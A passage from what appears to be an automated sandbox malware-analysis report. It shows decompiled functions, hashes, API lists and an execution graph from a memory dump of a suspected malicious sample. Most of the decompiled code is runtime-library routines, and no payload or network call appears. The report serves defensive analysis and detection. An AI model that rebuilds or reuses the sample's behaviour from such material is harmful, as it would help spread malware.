											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0xbe5dcc;
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0xbe7000();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E00BD1C3C(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0xbe33a8);
									E00BCD960(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E00BD790B(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E00BD739D(_t103, _t108[0x18], E00BCDDA0( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E00BD73AD(_t103, _t108[0x18], E00BCDDA0( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E00BCDDA0();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}



















                          0x00bd790b
                          0x00bd790d
                          0x00bd7912
                          0x00bd7917
                          0x00bd7919
                          0x00bd791c
                          0x00bd7921
                          0x00bd7a31
                          0x00bd7a31
                          0x00bd7a31
                          0x00000000
                          0x00bd7930
                          0x00bd7930
                          0x00bd7935
                          0x00bd793f
                          0x00bd7941
                          0x00bd7946
                          0x00bd794b
                          0x00bd794b
                          0x00bd794d
                          0x00bd7950
                          0x00bd7955
                          0x00bd7977
                          0x00bd7977
                          0x00bd797a
                          0x00bd797d
                          0x00bd799b
                          0x00bd799e
                          0x00bd79dd
                          0x00bd79e0
                          0x00bd79e3
                          0x00bd7a08
                          0x00bd7a0a
                          0x00000000
                          0x00bd7a0c
                          0x00bd7a0c
                          0x00bd7a0e
                          0x00000000
                          0x00bd7a10
                          0x00bd7a10
                          0x00bd7a15
                          0x00bd7a19
                          0x00bd7a19
                          0x00bd7a1a
                          0x00000000
                          0x00bd7a1a
                          0x00bd7a0e
                          0x00bd79e5
                          0x00bd79e5
                          0x00bd79e7
                          0x00000000
                          0x00bd79e9
                          0x00bd79e9
                          0x00bd79eb
                          0x00000000
                          0x00bd79ed
                          0x00bd79fe
                          0x00000000
                          0x00bd7a03
                          0x00bd79eb
                          0x00bd79e7
                          0x00bd79a0
                          0x00bd79a0
                          0x00bd79a4
                          0x00000000
                          0x00bd79aa
                          0x00bd79aa
                          0x00bd79ac
                          0x00000000
                          0x00bd79b2
                          0x00bd79b9
                          0x00bd79c1
                          0x00bd79c5
                          0x00bd79c7
                          0x00bd79ca
                          0x00bd79cf
                          0x00bd79d0
                          0x00000000
                          0x00bd79d0
                          0x00bd79ca
                          0x00000000
                          0x00bd79c5
                          0x00bd79ac
                          0x00bd79a4
                          0x00bd797f
                          0x00bd797f
                          0x00000000
                          0x00bd797f
                          0x00bd795c
                          0x00bd795c
                          0x00bd7961
                          0x00bd7966
                          0x00000000
                          0x00bd7968
                          0x00bd796a
                          0x00bd7973
                          0x00bd7982
                          0x00bd7984
                          0x00bd7a43
                          0x00bd7a43
                          0x00bd7a48
                          0x00bd7a49
                          0x00bd7a4b
                          0x00bd7a50
                          0x00bd7a55
                          0x00bd7a58
                          0x00bd7a5b
                          0x00bd7a5e
                          0x00bd7a67
                          0x00bd7a67
                          0x00bd7a60
                          0x00bd7a60
                          0x00bd7a60
                          0x00bd7a6a
                          0x00bd7a6e
                          0x00bd7a71
                          0x00bd7a72
                          0x00bd7a73
                          0x00bd7a74
                          0x00bd7a77
                          0x00bd7a80
                          0x00bd7a80
                          0x00bd7a83
                          0x00bd7ab9
                          0x00bd7a85
                          0x00bd7a85
                          0x00bd7a85
                          0x00bd7a88
                          0x00bd7a9f
                          0x00bd7a9f
                          0x00bd7a88
                          0x00bd7abe
                          0x00bd7ac8
                          0x00bd7ad4
                          0x00bd7992
                          0x00bd7992
                          0x00bd7997
                          0x00bd7998
                          0x00bd79d2
                          0x00bd79d9
                          0x00bd7a1d
                          0x00bd7a1d
                          0x00bd7a24
                          0x00bd7a33
                          0x00bd7a36
                          0x00bd7a42
                          0x00bd7a42
                          0x00bd7984
                          0x00bd7966
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd7935

                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: AdjustPointer
                          • String ID:
                          • API String ID: 1740715915-0
                          • Opcode ID: 4a5e959ceaf9486d0ecd2f048a1b23155eeb0df3e5d15757389b7ce455b09beb
                          • Instruction ID: 5a23051735fc6edf080b28698ee5938045b62bac4020f5d60410845196230ab7
                          • Opcode Fuzzy Hash: 4a5e959ceaf9486d0ecd2f048a1b23155eeb0df3e5d15757389b7ce455b09beb
                          • Instruction Fuzzy Hash: 8351A172688606AFDB298F54D841BBDF7E5EF40710F2444AEE80557391FB319E40CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCB2E0 Relevance: 6.1, APIs: 4, Instructions: 114COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: ColorObjectSelect$Text
                          • String ID:
                          • API String ID: 2688426544-0
                          • Opcode ID: 437d72c37d25abe2176962fb19bccaa5834d2c902f056f940b2c33c334b15dbd
                          • Instruction ID: e772738e08ae80a275432a25905418feaeacdce6927fa2a20290baefd137826f
                          • Opcode Fuzzy Hash: 437d72c37d25abe2176962fb19bccaa5834d2c902f056f940b2c33c334b15dbd
                          • Instruction Fuzzy Hash: 5D517F74A04208DFCB04EF68D599AACBBF1FB48314F1584ADE8899B351DB31E981DB45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC8DB0 Relevance: 6.1, APIs: 4, Instructions: 70windowCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: Menu$CreateLongPopupSystemWindow
                          • String ID:
                          • API String ID: 3388415271-0
                          • Opcode ID: de003aa06a4f99fb76ccafd7e5c57f6197b372da64fe5b86bc7a6e83acd25062
                          • Instruction ID: 3285481601ee2f93b536fb8b054d6d936cf25c04262e3d1d651afebc832a9335
                          • Opcode Fuzzy Hash: de003aa06a4f99fb76ccafd7e5c57f6197b372da64fe5b86bc7a6e83acd25062
                          • Instruction Fuzzy Hash: 86318374A04208EFCB44EF68D188B9DBBF0FB48311F5184ADE8899B351DB749A84CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD8FCD Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00BD8FCD(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0xbe48b0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E00BD9041();
					E00BD9022();
					_t13 = WriteConsoleW( *0xbe48b0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                          0x00bd8fea
                          0x00bd8fee
                          0x00bd8ffb
                          0x00bd9000
                          0x00bd901b
                          0x00bd901b
                          0x00bd9021

                          APIs
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00BD8B32,?,00000001,?,?,?,00BD6E1E,?,?,00000000), ref: 00BD8FE4
                          • GetLastError.KERNEL32(?,00BD8B32,?,00000001,?,?,?,00BD6E1E,?,?,00000000,?,?,?,00BD6769,?), ref: 00BD8FF0
                            • Part of subcall function 00BD9041: CloseHandle.KERNEL32(FFFFFFFE,00BD9000,?,00BD8B32,?,00000001,?,?,?,00BD6E1E,?,?,00000000,?,?), ref: 00BD9051
                          • ___initconout.LIBCMT ref: 00BD9000
                            • Part of subcall function 00BD9022: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00BD8FBE,00BD8B1F,?,?,00BD6E1E,?,?,00000000,?), ref: 00BD9035
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00BD8B32,?,00000001,?,?,?,00BD6E1E,?,?,00000000,?), ref: 00BD9015
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                          • String ID:
                          • API String ID: 2744216297-0
                          • Opcode ID: 13a3c7a2b016f7d468742d5766015dfa8ce7c20b288094916cb6ac12e315aadf
                          • Instruction ID: 8bdd462381aeb6e8e74945180be79002705613dd8329799f4d3d2019a7b32069
                          • Opcode Fuzzy Hash: 13a3c7a2b016f7d468742d5766015dfa8ce7c20b288094916cb6ac12e315aadf
                          • Instruction Fuzzy Hash: 27F0C736500195BFCF222FD5EC459997FA5FB093A1F544551FD199B230DB7188209BD0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC7990 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: _strlen
                          • String ID: (
                          • API String ID: 4218353326-3887548279
                          • Opcode ID: 16c88b7bd7cf7ee8278c332004bb7f646ccda41a30472927e537f375c094df9b
                          • Instruction ID: c435d2da6c6cd35435ecbbcadfdd01732c9dfd5e9b80d9082804595d16c6bc19
                          • Opcode Fuzzy Hash: 16c88b7bd7cf7ee8278c332004bb7f646ccda41a30472927e537f375c094df9b
                          • Instruction Fuzzy Hash: 6D51E471904209ABDB15DF58C496BADBBF0FB04314F04C8AEE869DB351DA34EA94CF45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD777B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 47%
                          			E00BD777B(void* __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20, signed int _a24, signed int _a28, signed char _a32) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t37;
				signed int _t46;
				void* _t52;
				void* _t54;
				signed int* _t55;
				void* _t58;
				void* _t59;
				void* _t61;
				intOrPtr* _t63;

				E00BD2137(_a12);
				_pop(_t54);
				_t37 = E00BD1CCE(_t52, _t54, __edx, _t59, _t61);
				_t55 = _a20;
				_t58 = _a4;
				if( *((intOrPtr*)(_t37 + 0x20)) != 0 ||  *_t58 == 0xe06d7363 ||  *_t58 == 0x80000026 || ( *_t55 & 0x1fffffff) < 0x19930522 || (_t55[8] & 0x00000001) == 0) {
					if(( *(_t58 + 4) & 0x00000066) == 0) {
						if(_t55[3] != 0) {
							L14:
							if( *_t58 != 0xe06d7363 ||  *((intOrPtr*)(_t58 + 0x10)) < 3 ||  *((intOrPtr*)(_t58 + 0x14)) <= 0x19930522) {
								L19:
								E00BD7AE2(_t58, _t58, _a8, _a12, _a16, _t55, _a32, _a24, _a28);
								goto L20;
							} else {
								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0x1c)) + 8));
								if(_t63 == 0) {
									goto L19;
								}
								 *0xbe7000(_t58, _a8, _a12, _a16, _t55, _a24, _a28, _a32 & 0x000000ff);
								return  *_t63();
							}
						}
						_t46 =  *_t55 & 0x1fffffff;
						if(_t46 < 0x19930521 || _t55[7] == 0) {
							if(_t46 < 0x19930522 || (_t55[8] >> 0x00000002 & 0x00000001) == 0) {
								goto L20;
							} else {
								goto L14;
							}
						} else {
							goto L14;
						}
					}
					if(_t55[1] != 0 && _a24 == 0) {
						L00BD737A(_a8, _a16, _t55);
					}
					goto L20;
				} else {
					L20:
					return 1;
				}
			}
















                          0x00bd7784
                          0x00bd7789
                          0x00bd778a
                          0x00bd778f
                          0x00bd7794
                          0x00bd77a4
                          0x00bd77cc
                          0x00bd77f7
                          0x00bd7817
                          0x00bd781d
                          0x00bd7859
                          0x00bd786d
                          0x00000000
                          0x00bd782a
                          0x00bd782d
                          0x00bd7832
                          0x00000000
                          0x00000000
                          0x00bd784c
                          0x00000000
                          0x00bd7854
                          0x00bd781d
                          0x00bd77fb
                          0x00bd7802
                          0x00bd780b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd7802
                          0x00bd77d1
                          0x00bd77e7
                          0x00bd77ec
                          0x00000000
                          0x00bd7875
                          0x00bd7875
                          0x00000000
                          0x00bd7877

                          APIs
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00BD7784
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: ___except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3493665558-3733052814
                          • Opcode ID: d6d6c0c84a67f9f1996ee3ed615194ef4665ba9dd325f74a71c3e2602f87c034
                          • Instruction ID: 0a20c10aa675d8c473df93d017a5fa2a21197ba4ae57165ccb7376187057575c
                          • Opcode Fuzzy Hash: d6d6c0c84a67f9f1996ee3ed615194ef4665ba9dd325f74a71c3e2602f87c034
                          • Instruction Fuzzy Hash: A131A135584215EBCF264F51C8499EABBE6FB09315B184A9BF85449311FB33CC62EB81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC49A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: EnumFamiliesFont
                          • String ID: 1$\
                          • API String ID: 2229041460-1239263948
                          • Opcode ID: 21f208f69169363252523435910f3441a73f4fbda56cafe6892c39276eefb9f9
                          • Instruction ID: d923082c30183e31aa93e87a6aeaea11c6e4619f775bc8e5e8a434afaa3030e0
                          • Opcode Fuzzy Hash: 21f208f69169363252523435910f3441a73f4fbda56cafe6892c39276eefb9f9
                          • Instruction Fuzzy Hash: 08418C74A04208DFDB04DF58C094BAABBF0FF48354F15C4AEE8898B362D775AA84CB41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC74E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76fileCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: ErrorFileLastWrite
                          • String ID: write failed: %lu
                          • API String ID: 442123175-171016427
                          • Opcode ID: 378bc5a7f72e70fd5328b4a7c9b028bb87e455e4c6470b13b6e4044c48abd40b
                          • Instruction ID: 67146eb22eb80ed52424c28265efec637d576151607cc6305f97882ede21ec30
                          • Opcode Fuzzy Hash: 378bc5a7f72e70fd5328b4a7c9b028bb87e455e4c6470b13b6e4044c48abd40b
                          • Instruction Fuzzy Hash: 7831C2B5508249DFCB00EF28C488BAA7BE5FF44344F0589A9F8898B351D774E994CF82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC7610 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40fileCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: ErrorFileLastWrite
                          • String ID: write failed: %lu
                          • API String ID: 442123175-171016427
                          • Opcode ID: f158aa2edf339e964e3545ebfe5620a7781c5c4943ad3a279a14b1c11029733a
                          • Instruction ID: b91c246cbbd13845b10fdeeab626d8d37d019468f7ec298a4045c45df09480c2
                          • Opcode Fuzzy Hash: f158aa2edf339e964e3545ebfe5620a7781c5c4943ad3a279a14b1c11029733a
                          • Instruction Fuzzy Hash: 6F11F0B05082089FC700EF1CD488BAABBE5EF44354F5585BDE8898B361DB749988CBD2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:4.7%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:3%
                          Total number of Nodes:527
                          Total number of Limit Nodes:69
                          execution_graph 26833 41f190 26834 41f19b 26833->26834 26836 41b970 26833->26836 26837 41b996 26836->26837 26844 409d40 26837->26844 26839 41b9a2 26840 41b9c3 26839->26840 26852 40c1c0 26839->26852 26840->26834 26842 41b9b5 26888 41a6b0 26842->26888 26891 409c90 26844->26891 26846 409d4d 26847 409d54 26846->26847 26903 409c30 26846->26903 26847->26839 26853 40c1e5 26852->26853 27305 40b1c0 26853->27305 26855 40c23c 27309 40ae40 26855->27309 26857 40c262 26887 40c4b3 26857->26887 27318 4143a0 26857->27318 26859 40c2a7 26859->26887 27321 408a60 26859->27321 26861 40c2eb 26861->26887 27328 41a500 26861->27328 26865 40c341 26866 40c348 26865->26866 27338 41a010 26865->27338 26868 41bdc0 2 API calls 26866->26868 26869 40c355 26868->26869 26869->26842 26871 40c392 26872 41bdc0 2 API calls 26871->26872 26873 40c399 26872->26873 26873->26842 26874 40c3a2 26875 40f4a0 LdrLoadDll 26874->26875 26876 40c416 26875->26876 26876->26866 26877 40c421 26876->26877 26878 41bdc0 2 API calls 26877->26878 26879 40c445 26878->26879 27341 41a060 26879->27341 26882 41a010 LdrLoadDll 26883 40c480 26882->26883 26883->26887 27344 419e20 26883->27344 26886 41a6b0 2 API calls 26886->26887 26887->26842 26889 41af60 LdrLoadDll 26888->26889 26890 41a6cf ExitProcess 26889->26890 26890->26840 26892 409ca3 26891->26892 26942 418bc0 LdrLoadDll 26891->26942 26922 418a70 26892->26922 26895 409cb6 26895->26846 26896 409cac 26896->26895 26925 41b2b0 26896->26925 26898 409cf3 26898->26895 26936 409ab0 26898->26936 26900 409d13 26943 409620 LdrLoadDll 26900->26943 26902 409d25 26902->26846 27283 41b5a0 26903->27283 26906 41b5a0 LdrLoadDll 26907 409c5b 26906->26907 26908 41b5a0 LdrLoadDll 26907->26908 26909 409c71 26908->26909 26910 40f180 26909->26910 26911 40f199 26910->26911 27291 40b040 26911->27291 26913 40f1ac 27295 41a1e0 26913->27295 26917 40f1d2 26921 40f1fd 26917->26921 27301 41a260 26917->27301 26918 41a490 2 API calls 26920 409d65 26918->26920 26920->26839 26921->26918 26944 41a600 26922->26944 26926 41b2c9 26925->26926 26957 414a50 26926->26957 26928 41b2e1 26929 41b2ea 26928->26929 26996 41b0f0 26928->26996 26929->26898 26931 41b2fe 26931->26929 27014 419f00 26931->27014 27264 407ea0 26936->27264 26938 409ad1 26938->26900 26939 409aca 26939->26938 27277 408160 26939->27277 26942->26892 26943->26902 26947 41af60 26944->26947 26946 418a85 26946->26896 26948 41af70 26947->26948 26949 41af92 26947->26949 26951 414e50 26948->26951 26949->26946 26952 414e5e 26951->26952 26953 414e6a 26951->26953 26952->26953 26956 4152d0 LdrLoadDll 26952->26956 26953->26949 26955 414fbc 26955->26949 26956->26955 26958 414d85 26957->26958 26969 414a64 26957->26969 26958->26928 26961 414b90 27023 41a360 26961->27023 26962 414b73 27080 41a460 LdrLoadDll 26962->27080 26965 414bb7 26967 41bdc0 2 API calls 26965->26967 26966 414b7d 26966->26928 26968 414bc3 26967->26968 26968->26966 26970 414d49 26968->26970 26971 414d5f 26968->26971 26976 414c52 26968->26976 26969->26958 27020 419c50 26969->27020 26972 41a490 2 API calls 26970->26972 27089 414790 LdrLoadDll NtReadFile NtClose 26971->27089 26975 414d50 26972->26975 26974 414d72 26974->26928 26975->26928 26977 414cb9 26976->26977 26979 414c61 26976->26979 26977->26970 26978 414ccc 26977->26978 27082 41a2e0 26978->27082 26981 414c66 26979->26981 26982 414c7a 26979->26982 27081 414650 LdrLoadDll NtClose 26981->27081 26985 414c97 26982->26985 26986 414c7f 26982->26986 26985->26975 27038 414410 26985->27038 27026 4146f0 26986->27026 26988 414c70 26988->26928 26990 414d2c 27086 41a490 26990->27086 26991 414c8d 26991->26928 26993 414caf 26993->26928 26995 414d38 26995->26928 26997 41b101 26996->26997 26998 41b113 26997->26998 27107 41bd40 26997->27107 26998->26931 27000 41b134 27110 414070 27000->27110 27002 41b180 27002->26931 27003 41b157 27003->27002 27004 414070 3 API calls 27003->27004 27006 41b179 27004->27006 27006->27002 27142 415390 27006->27142 27007 41b20a 27008 41b21a 27007->27008 27234 41af00 LdrLoadDll 27007->27234 27152 41ad70 27008->27152 27011 41b248 27231 419ec0 27011->27231 27015 41af60 LdrLoadDll 27014->27015 27016 419f1c 27015->27016 27017 41bdc0 27016->27017 27261 41a670 27017->27261 27019 41b359 27019->26898 27021 41af60 LdrLoadDll 27020->27021 27022 414b44 27021->27022 27022->26961 27022->26962 27022->26966 27024 41a37c NtCreateFile 27023->27024 27025 41af60 LdrLoadDll 27023->27025 27024->26965 27025->27024 27027 41470c 27026->27027 27028 41a2e0 LdrLoadDll 27027->27028 27029 41472d 27028->27029 27030 414734 27029->27030 27031 414748 27029->27031 27032 41a490 2 API calls 27030->27032 27033 41a490 2 API calls 27031->27033 27034 41473d 27032->27034 27035 414751 27033->27035 27034->26991 27090 41bfd0 LdrLoadDll RtlAllocateHeap 27035->27090 27037 41475c 27037->26991 27039 41445b 27038->27039 27040 41448e 27038->27040 27041 41a2e0 LdrLoadDll 27039->27041 27042 4145d9 27040->27042 27045 4144aa 27040->27045 27043 414476 27041->27043 27044 41a2e0 LdrLoadDll 27042->27044 27046 41a490 2 API calls 27043->27046 27049 4145f4 27044->27049 27047 41a2e0 LdrLoadDll 27045->27047 27048 41447f 27046->27048 27050 4144c5 27047->27050 27048->26993 27103 41a320 LdrLoadDll 27049->27103 27052 4144e1 27050->27052 27053 4144cc 27050->27053 27056 4144e6 27052->27056 27057 4144fc 27052->27057 27055 41a490 2 API calls 27053->27055 27054 41462e 27058 41a490 2 API calls 27054->27058 27059 4144d5 27055->27059 27060 41a490 2 API calls 27056->27060 27065 414501 27057->27065 27091 41bf90 27057->27091 27061 414639 27058->27061 27059->26993 27062 4144ef 27060->27062 27061->26993 27062->26993 27074 414513 27065->27074 27094 41a410 27065->27094 27066 414567 27067 41457e 27066->27067 27102 41a2a0 LdrLoadDll 27066->27102 27069 414585 27067->27069 27070 41459a 27067->27070 27072 41a490 2 API calls 27069->27072 27071 41a490 2 API calls 27070->27071 27073 4145a3 27071->27073 27072->27074 27075 4145cf 27073->27075 27097 41bb90 27073->27097 27074->26993 